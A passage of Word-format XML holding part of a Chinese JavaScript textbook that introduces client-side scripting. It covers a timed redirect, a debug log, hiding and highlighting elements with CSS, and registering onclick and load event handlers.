        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function moveon(){//</w:t>
      </w:r>
      <w:r>
        <w:t>通过弹出一个对话框来询问用户一个问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var answer=confirm("</w:t>
      </w:r>
      <w:r>
        <w:t>准备好了吗</w:t>
      </w:r>
      <w:r>
        <w:t>?");//</w:t>
      </w:r>
      <w:r>
        <w:t>单击</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>确定</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>按钮，浏览器会加载一个新页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(answer)window.location="http://taobao.com";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>分钟（</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>万毫秒）后执行定义的这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(moveon,60000);</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我们注意到，本节展示的客户端示例代码要比前面的示例代码要长很多。这里的示例代码并不是用来在</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>（或者其他调试工具）控制台窗口中直接输入的，而是作为一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件，并在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中直接打开运行的。比如，上述代码段就是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件的完整内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章的内容更加务实</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>通过脚本来操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档内容。它将展示如何选取特定的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素、如何给</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素设置属性、如何修改元素内容，以及如何给文档添加新节点。这里的示例函数展示了如何查找和修改基本文档的内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个指定的区域输出调试消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>不存在这样一个区域，则创建一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function debug(msg){//</w:t>
      </w:r>
      <w:r>
        <w:t>通过查看</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性来查找文档的调试部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var log=document.getElementById("debuglog");//</w:t>
      </w:r>
      <w:r>
        <w:t>如果这个元素不存在，则创建一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!log){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>log=document.createElement("div");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新的＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>log.id="debuglog";//</w:t>
      </w:r>
      <w:r>
        <w:t>给这个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML i</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>赋值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>log.innerHTML="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Debug Log</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";//</w:t>
      </w:r>
      <w:r>
        <w:t>定义初始内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.appendChild(log);//</w:t>
      </w:r>
      <w:r>
        <w:t>将其添加到文档的末尾</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将消息包装在＜</w:t>
      </w:r>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:r>
        <w:t>＞中，并添加至</w:t>
      </w:r>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pre=document.createElement("pre");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建＜</w:t>
      </w:r>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=document.createTextNode(msg);//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>msg</w:t>
      </w:r>
      <w:r>
        <w:t>包装在一个文本节点中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pre.appendChild(text);//</w:t>
      </w:r>
      <w:r>
        <w:t>将文本添加至＜</w:t>
      </w:r>
      <w:r>
        <w:t>pr</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>log.appendChild(pre);//</w:t>
      </w:r>
      <w:r>
        <w:t>将＜</w:t>
      </w:r>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:r>
        <w:t>＞添加至</w:t>
      </w:r>
      <w:r>
        <w:t>log</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第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章讲述</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>如何操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中定义</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>内容的元素。第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章讲述如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来进行</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式操作，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式定义了内容的展示方式。这通常会使用到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function hide(e,reflow){//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>操纵样式来隐藏元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(reflow){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果第二个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.display="none"//</w:t>
      </w:r>
      <w:r>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r>
        <w:t>这个元素，其所占的空间也随之消失</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>否则</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.visibility="hidden";//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>隐藏，但是保留其所占的空间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function highlight(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类来高亮显示</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>简单地定义或追加</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>类属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里假设</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表中已经有</w:t>
      </w:r>
      <w:r>
        <w:t>"hilite"</w:t>
      </w:r>
      <w:r>
        <w:t>类的定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!e.className)e.className="hilite";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else e.className+="hilite";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可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来操控</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>内容和文档的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式，同样，也可以通过事件处理程序（</w:t>
      </w:r>
      <w:r>
        <w:t>event handler</w:t>
      </w:r>
      <w:r>
        <w:t>）来定义文档的行为。事件处理程序是一个在浏览器中注册的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数，当特定类型的事件发生时浏览器便调用这个函数。通常我们关心的事件类型是鼠标点击事件和键盘按键事件（在智能手机中则是各种触碰事件）。或者说，当浏览器完成了文档的加载，当用户改变窗口大小或当用户向</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单元素中输入数据时便会触发一个事件。第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章详细描述如何定义、注册事件处理程序，以及在事件发生</w:t>
      </w:r>
      <w:r>
        <w:t>时浏览器是如何调用它们的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义事件处理程序最简单的方法是，给</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的以</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>为前缀的属性绑定一个回调。当写一些简单的测试程序时，最实用的方法就是给</w:t>
      </w:r>
      <w:r>
        <w:t>"onclick"</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序绑定回调。假定已经将上文中的</w:t>
      </w:r>
      <w:r>
        <w:t>debug()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>两个函数保存至名为</w:t>
      </w:r>
      <w:r>
        <w:t>debug.js</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>hide.js</w:t>
      </w:r>
      <w:r>
        <w:t>的文件中，那么就可以写一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>测试文件，来给＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定一个事件处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="debug.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="hide.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Hello</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="hide(this,true);debug('hide button 1');"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Hide1</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="hide(this);debug('hide button 2');"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Hide2</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>World</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面这些客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码用到了事件，它给一个很重要的事件</w:t>
      </w:r>
      <w:r>
        <w:t>——"load"</w:t>
      </w:r>
      <w:r>
        <w:t>事件注册了一个事件处理程序。同时，也展示了注册</w:t>
      </w:r>
      <w:r>
        <w:t>"click"</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理函数更高级的一种方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"load"</w:t>
      </w:r>
      <w:r>
        <w:t>事件只有在文档加载完成后才会触发</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通常需要等待</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件发生后才开始执行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>当文档加载完成时执行这里的代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>找到文档中所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var images=document.getElementsByTagName("img");//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>images</w:t>
      </w:r>
      <w:r>
        <w:t>，给每个节点的</w:t>
      </w:r>
      <w:r>
        <w:t>"click"</w:t>
      </w:r>
      <w:r>
        <w:t>事件添加事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在点击图片的时候将图片隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>images.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>va</w:t>
      </w:r>
      <w:r>
        <w:t>r image=images[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(image.addEventListener)//</w:t>
      </w:r>
      <w:r>
        <w:t>注册事件处理程序的另一种方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>image.addEventListener("click",hide,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else//</w:t>
      </w:r>
      <w:r>
        <w:t>兼容</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及以前的版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>image.attachEvent("onclick",hide);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这便是上面注册的事件处理函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function hide(event){event.target.style.visibility="hidden";}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第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章讲述了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来操控网页的内容（</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>）、样式（</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>）以及行为（事件处理）。这些章所讨论的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>多少有些复杂，且至今仍具有糟糕的浏览器兼容性。也正是由于这个原因，很多客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员选择使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>框架</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来简化他们的编码工作。最流行的库非</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>莫属。第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章将会详细</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>介绍</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>库。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
